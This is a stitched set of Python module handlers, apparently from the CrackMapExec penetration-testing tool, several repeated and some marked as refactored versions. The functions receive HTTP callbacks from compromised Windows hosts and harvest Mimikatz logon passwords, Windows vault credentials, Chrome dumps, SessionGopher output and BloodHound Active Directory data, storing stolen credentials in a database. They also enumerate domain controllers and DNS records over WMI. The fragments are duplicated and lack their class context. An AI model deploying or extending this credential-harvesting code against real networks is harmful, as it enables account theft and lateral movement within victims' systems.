def on_response(self, context, response):
    """Handle the HTTP callback carrying Get-NetDomainController output.

    Acknowledges the request, parses each table row into hostname, domain
    and IP, records every parsed row in the database as a domain
    controller, and writes the raw payload to a timestamped log file.
    A row that does not split into three fields is logged and skipped.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.getheader('content-length'))
    data = response.rfile.read(body_len)
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    added = 0
    if len(data):
        for row in StringIO(data).readlines():
            # Skip the blank separator, the column header and the rule line.
            if row == '\r\n' or row.startswith('Name') or row.startswith('---'):
                continue
            try:
                hostname, domain, ip = filter(None, row.strip().split(' '))
                # Keep only the short (first label) form, upper-cased.
                hostname = hostname.split('.')[0].upper()
                domain = domain.split('.')[0].upper()
                context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip))
                context.db.add_computer(ip, hostname, domain, '', dc=True)
                added += 1
            except Exception:
                context.log.error('Error parsing Domain Controller entry')

    context.log.success('Added {} Domain Controllers to the database'.format(highlight(added)))

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'Get_NetDomainController-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved raw output to {}".format(log_name))
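def on_response(self, context, response):
    """Handle the HTTP callback carrying Invoke-Mimikatz output.

    When the module was run with ``sekurlsa::logonpasswords`` the output is
    parsed into credential tuples and each one is stored against the host
    that posted it; any other command's output is only echoed. The raw
    payload is always written to a timestamped log file.

    Improvement over the previous version: the database lookup of the
    posting host's id was repeated inside the credential loop although it
    never changes; it is now done once per response.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.getheader('content-length'))
    data = response.rfile.read(body_len)
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    if len(data):
        if self.command.find('sekurlsa::logonpasswords') == -1:
            context.log.highlight(data)
        else:
            creds = self.parse_mimikatz(data)
            if len(creds):
                # Resolve the posting host's DB id once; every credential links to it.
                hostid = context.db.get_computers(response.client_address[0])[0][0]
                for credtype, domain, username, password, _, _ in creds:
                    context.db.add_credential(credtype, domain, username, password, pillaged_from=hostid)
                    context.log.highlight('{}\\{}:{}'.format(domain, username, password))
                context.log.success("Added {} credential(s) to the database".format(highlight(len(creds))))

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved raw Mimikatz output to {}".format(log_name))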
def on_response(self, context, response):
    """Handle the HTTP callback carrying Invoke-Mimikatz output.

    When the module was run with ``sekurlsa::logonpasswords`` the output is
    parsed into credential tuples and each one is stored against the host
    that posted it; any other command's output is only echoed. The raw
    payload is always written to a timestamped log file.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.getheader('content-length'))
    data = response.rfile.read(body_len)
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    if len(data):
        if self.command.find('sekurlsa::logonpasswords') == -1:
            context.log.highlight(data)
        else:
            creds = self.parse_mimikatz(data)
            if len(creds):
                for credtype, domain, username, password, _, _ in creds:
                    # Resolve the posting host's DB id so the credential is linked to it.
                    hostid = context.db.get_computers(response.client_address[0])[0][0]
                    context.db.add_credential(credtype, domain, username, password, hostid)
                    context.log.highlight('{}\\{}:{}'.format(domain, username, password))
                context.log.success("Added {} credential(s) to the database".format(highlight(len(creds))))

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved raw Mimikatz output to {}".format(log_name))
def on_response(self, context, response):
    """Handle the HTTP callback carrying Get-NetDomainController output.

    Acknowledges the request, parses each table row into hostname, domain
    and IP, records every parsed row in the database as a domain
    controller, and writes the raw payload to a timestamped log file.
    A row that does not split into three fields is logged and skipped.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.getheader('content-length'))
    data = response.rfile.read(body_len)
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    added = 0
    if len(data):
        for row in StringIO(data).readlines():
            # Skip the blank separator, the column header and the rule line.
            if row == '\r\n' or row.startswith('Name') or row.startswith('---'):
                continue
            try:
                hostname, domain, ip = filter(None, row.strip().split(' '))
                # Keep only the short (first label) form, upper-cased.
                hostname = hostname.split('.')[0].upper()
                domain = domain.split('.')[0].upper()
                context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip))
                context.db.add_computer(ip, hostname, domain, '', dc=True)
                added += 1
            except Exception:
                context.log.error('Error parsing Domain Controller entry')

    context.log.success('Added {} Domain Controllers to the database'.format(highlight(added)))

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'Get_NetDomainController-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved raw output to {}".format(log_name))
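def parse_ouput(self, data, context, response):
    ''' Parse the output from Invoke-BloodHound

    The payload is a sequence of CSV tables separated by "!-!". Each table
    is classified by the pair of column names it contains, re-split into
    one row per line and written to a timestamped csv file named after the
    table kind and the posting host. A table matching none of the known
    column pairs is dropped silently.

    Improvement over the previous version: the five branches each repeated
    the same three lines; the classification is now a single ordered table
    and the index loop over the split data is a direct iteration.
    '''
    # Checked in this order: the first pair that matches decides the file
    # name, so (ComputerName, UserName) wins over (ComputerName, AccountName).
    table_kinds = (
        (('ComputerName', 'UserName'), 'user_sessions'),
        (('GroupName', 'AccountName'), 'group_membership.csv'),
        (('ComputerName', 'AccountName'), 'local_admins.csv'),
        (('SourceDomain', 'TrustType'), 'trusts.csv'),
        (('ObjectName', 'ObjectType'), 'acls.csv'),
    )
    for table in data.split("!-!"):
        for markers, kind in table_kinds:
            if all(marker in table for marker in markers):
                stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
                log_name = '{}-{}-{}.csv'.format(kind, response.client_address[0], stamp)
                # The rows arrive space-separated; put each quoted row on its own line.
                write_log(table.replace('" "', '"\n"').replace(' "', '"'), log_name)
                context.log.info("Saved csv output to {}".format(log_name))
                break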
def call_cmd_args(self):
    """Invoke every method of this object named after a set command-line flag.

    Walks the parsed arguments; for each argument whose name is also a
    callable attribute on ``self`` and whose value is neither False nor
    None, the method is called with no arguments. When ``self.export`` is
    set, each result is written (as ``str``) to the file named by its first
    element.
    """
    for flag, value in vars(self.args).items():
        if value is False or value is None:
            continue
        handler = getattr(self, flag, None)
        if handler is None or not callable(handler):
            continue
        logging.debug('Calling {}()'.format(flag))
        result = handler()
        if self.export:
            write_log(str(result), self.export[0])
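def parse_ouput(self, data, context, response):
    ''' Parse the output from Invoke-BloodHound

    The payload is a sequence of CSV tables separated by "!-!". Each table
    is classified by the pair of column names it contains, re-split into
    one row per line and written to a timestamped csv file named after the
    table kind and the posting host. A table matching none of the known
    column pairs is dropped silently.

    Improvement over the previous version: the five branches each repeated
    the same three lines; the classification is now a single ordered table
    and the index loop over the split data is a direct iteration.
    '''
    # Checked in this order: the first pair that matches decides the file
    # name, so (ComputerName, UserName) wins over (ComputerName, AccountName).
    table_kinds = (
        (('ComputerName', 'UserName'), 'user_sessions'),
        (('GroupName', 'AccountName'), 'group_membership.csv'),
        (('ComputerName', 'AccountName'), 'local_admins.csv'),
        (('SourceDomain', 'TrustType'), 'trusts.csv'),
        (('ObjectName', 'ObjectType'), 'acls.csv'),
    )
    for table in data.split("!-!"):
        for markers, kind in table_kinds:
            if all(marker in table for marker in markers):
                stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
                log_name = '{}-{}-{}.csv'.format(kind, response.client_address[0], stamp)
                # The rows arrive space-separated; put each quoted row on its own line.
                write_log(table.replace('" "', '"\n"').replace(' "', '"'), log_name)
                context.log.info("Saved csv output to {}".format(log_name))
                break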
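def on_admin_login(self, context, connection):
    """List the target's network adapter configurations over WMI.

    Prints the IP address and DNS suffix search order of every adapter that
    reports an address, then writes the adapter records as JSON to a
    timestamped log file.

    Fix over the previous version: the loop appended the whole ``cards``
    list once per adapter, so the log held N nested copies of the list;
    each adapter is now appended once.
    """
    query = "select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration"
    cards = connection.wmi(query)
    data = []
    for card in cards:
        if card['IPAddress'].get('value'):
            context.log.success(f"IP Address: {card['IPAddress']['value']}\tSearch Domain: {card['DNSDomainSuffixSearchOrder']['value']}")
        data.append(card)

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'network-connections-{}-{}.log'.format(connection.args.target[0], stamp)
    write_log(json.dumps(data), log_name)
    context.log.info("Saved raw output to {}".format(log_name))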
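def on_response(self, context, response):
    """Handle the HTTP callback carrying Mimikatz vault enumeration output.

    Scans the text for "Ressource" entries, collects the URL, user name and
    password that follow each one (entries whose password is a binary blob
    are skipped), echoes the complete entries and writes the raw payload to
    a timestamped log file. A parse failure is logged and the entries
    gathered up to that point are still reported.

    Fixes over the previous version: the bare ``except:`` also swallowed
    KeyboardInterrupt/SystemExit and is narrowed to ``Exception``; the
    two highlight calls whose operator had been redacted ("******") in the
    listing are restored as string concatenation, matching the URL line.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.getheader('content-length'))
    data = response.rfile.read(body_len)
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    if len(data):
        lines = StringIO(data).readlines()
        creds = []
        try:
            for i, line in enumerate(lines):
                if 'Ressource' not in line:
                    continue
                # The user name is on the next line and the password four lines
                # down; an entry truncated at the end of the buffer raises IndexError.
                url = line.split(':', 1)[1].strip().replace('[STRING]', '')
                user = lines[i + 1].split(':', 1)[1].strip().replace('[STRING]', '')
                passw = lines[i + 4].split(':', 1)[1].strip().replace('[STRING]', '')
                if '[BYTE*]' not in passw:
                    creds.append({'url': url, 'user': user, 'passw': passw})
        except Exception:
            context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')

        if creds:
            context.log.success('Found saved Vault credentials:')
            for cred in creds:
                if cred['user'] and cred['passw']:
                    context.log.highlight('URL: ' + cred['url'])
                    context.log.highlight('Username: ' + cred['user'])
                    context.log.highlight('Password: ' + cred['passw'])
                    context.log.highlight('')

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'EnumVaultCreds-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved Mimikatz's output to {}".format(log_name))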
def on_response(self, context, response):
    """Handle the HTTP callback carrying SessionGopher output.

    Echoes every non-empty line of the posted text and writes the raw
    payload to a timestamped log file.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.getheader('content-length'))
    data = response.rfile.read(body_len)
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    if len(data):
        for line in StringIO(data.strip()).readlines():
            context.log.highlight(line.strip())

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'SessionGopher-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved output to {}".format(log_name))
def on_response(self, context, response):
    """Handle the HTTP callback carrying Get-ChromeDump output.

    Echoes every line of the decoded text and writes the payload to a
    timestamped log file.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.get('content-length'))
    # Strict UTF-8 decode: a malformed body raises UnicodeDecodeError here.
    data = response.rfile.read(body_len).decode()
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    if len(data):
        for line in StringIO(data).readlines():
            context.log.highlight(line)

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'ChromeDump-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved raw Get-ChromeDump output to {}".format(log_name))
def on_admin_login(self, context, connection):
    """Dump DNS records from the target's MicrosoftDNS WMI provider.

    Without a configured domain every zone name is fetched first; otherwise
    only the configured one is queried. Records of each zone are grouped by
    type, echoed to the log and written to a timestamped log file.
    """
    if self.domains:
        zones = [self.domains]
    else:
        zones = []
        zone_rows = connection.wmi('Select Name FROM MicrosoftDNS_Zone', 'root\\microsoftdns')
        if zone_rows:
            zones = [row['Name']['value'] for row in zone_rows]
            context.log.success('Domains retrieved: {}'.format(zones))

    chunks = []
    for zone in zones:
        # NOTE(review): the zone name is interpolated into the WQL literal
        # unescaped; names come from the target (or the module option), so a
        # double quote in one breaks the query rather than being matched.
        query = 'Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = "{}"'.format(zone)
        records = connection.wmi(query, 'root\\microsoftdns')
        if not records:
            continue

        context.log.highlight("Results for {}".format(zone))
        chunks.append("Results for {}\n".format(zone))

        by_type = {}
        for entry in records:
            # Text form is "<name> <ttl> <type> <value...>"; TTL is not used.
            parts = entry['TextRepresentation']['value'].split(' ')
            rname, rtype = parts[0], parts[2]
            rvalue = ' '.join(parts[3:])
            by_type.setdefault(rtype, []).append("{}: {}".format(rname, rvalue))

        for rtype, values in sorted(by_type.items()):
            context.log.highlight("Record Type: {}".format(rtype))
            chunks.append("Record Type: {}\n".format(rtype))
            for value in sorted(values):
                context.log.highlight("\t" + value)
                chunks.append("\t" + value + "\n")

    data = "".join(chunks)
    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'DNS-Enum-{}-{}.log'.format(connection.args.target[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved raw output to {}".format(log_name))
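def on_admin_login(self, context, connection):
    """Dump DNS records from the target's MicrosoftDNS WMI provider.

    Without a configured domain every zone name is fetched first; otherwise
    only the configured one is queried. Records of each zone are grouped by
    type, echoed to the log and written to a timestamped log file.

    Fix over the previous version: ``dict.iteritems()`` does not exist on
    Python 3 and raised AttributeError there; ``items()`` works on both.
    """
    if self.domains:
        zones = [self.domains]
    else:
        zones = []
        zone_rows = connection.wmi('Select Name FROM MicrosoftDNS_Zone', 'root\\microsoftdns')
        if zone_rows:
            zones = [row['Name']['value'] for row in zone_rows]
            context.log.success('Domains retrieved: {}'.format(zones))

    chunks = []
    for zone in zones:
        # NOTE(review): the zone name is interpolated into the WQL literal
        # unescaped; names come from the target (or the module option), so a
        # double quote in one breaks the query rather than being matched.
        query = 'Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = "{}"'.format(zone)
        records = connection.wmi(query, 'root\\microsoftdns')
        if not records:
            continue

        context.log.highlight("Results for {}".format(zone))
        chunks.append("Results for {}\n".format(zone))

        by_type = {}
        for entry in records:
            # Text form is "<name> <ttl> <type> <value...>"; TTL is not used.
            parts = entry['TextRepresentation']['value'].split(' ')
            rname, rtype = parts[0], parts[2]
            rvalue = ' '.join(parts[3:])
            by_type.setdefault(rtype, []).append("{}: {}".format(rname, rvalue))

        for rtype, values in sorted(by_type.items()):
            context.log.highlight("Record Type: {}".format(rtype))
            chunks.append("Record Type: {}\n".format(rtype))
            for value in sorted(values):
                context.log.highlight("\t" + value)
                chunks.append("\t" + value + "\n")

    data = "".join(chunks)
    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'DNS-Enum-{}-{}.log'.format(connection.args.target[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved raw output to {}".format(log_name))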
def on_response(self, context, response):
    """Handle the HTTP callback carrying Get-ChromeDump output.

    Echoes every line of the posted text and writes the raw payload to a
    timestamped log file.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.getheader('content-length'))
    data = response.rfile.read(body_len)
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    if len(data):
        for line in StringIO(data).readlines():
            context.log.highlight(line)

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'ChromeDump-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved raw Get-ChromeDump output to {}".format(log_name))

#def on_shutdown(self, context):
#    context.info('Removing SQLite assembly file')
#    connection.ps_execute('')
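def on_response(self, context, response):
    """Handle the HTTP callback carrying Mimikatz vault enumeration output.

    Scans the text for "Ressource" entries, collects the URL, user name and
    password that follow each one (entries whose password is a binary blob
    are skipped), echoes the complete entries and writes the raw payload to
    a timestamped log file. A parse failure is logged and the entries
    gathered up to that point are still reported.

    Fixes over the previous version: the bare ``except:`` also swallowed
    KeyboardInterrupt/SystemExit and is narrowed to ``Exception``; the
    two highlight calls whose operator had been redacted ("******") in the
    listing are restored as string concatenation, matching the URL line.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.getheader('content-length'))
    data = response.rfile.read(body_len)
    # The callback has arrived; this host no longer needs to be tracked.
    response.stop_tracking_host()

    if len(data):
        lines = StringIO(data).readlines()
        creds = []
        try:
            for i, line in enumerate(lines):
                if 'Ressource' not in line:
                    continue
                # The user name is on the next line and the password four lines
                # down; an entry truncated at the end of the buffer raises IndexError.
                url = line.split(':', 1)[1].strip().replace('[STRING]', '')
                user = lines[i + 1].split(':', 1)[1].strip().replace('[STRING]', '')
                passw = lines[i + 4].split(':', 1)[1].strip().replace('[STRING]', '')
                if '[BYTE*]' not in passw:
                    creds.append({'url': url, 'user': user, 'passw': passw})
        except Exception:
            context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')

        if creds:
            context.log.success('Found saved Vault credentials:')
            for cred in creds:
                if cred['user'] and cred['passw']:
                    context.log.highlight('URL: ' + cred['url'])
                    context.log.highlight('Username: ' + cred['user'])
                    context.log.highlight('Password: ' + cred['passw'])
                    context.log.highlight('')

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'EnumVaultCreds-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved Mimikatz's output to {}".format(log_name))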
def on_response(self, context, response):
    """Handle the HTTP callback carrying the executed assembly's output.

    Decodes the body leniently, echoes every non-empty line and writes the
    decoded text to a timestamped log file.
    """
    response.send_response(200)
    response.end_headers()
    body_len = int(response.headers.get('content-length'))
    # Undecodable bytes are dropped rather than failing the whole callback.
    data = response.rfile.read(body_len).decode('UTF-8', 'ignore')
    response.stop_tracking_host()

    if len(data):
        for line in StringIO(data.strip()).readlines():
            context.log.highlight(line.strip())

    stamp = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    log_name = 'execute_assembly-{}-{}.log'.format(response.client_address[0], stamp)
    write_log(data, log_name)
    context.log.info("Saved output to {}".format(log_name))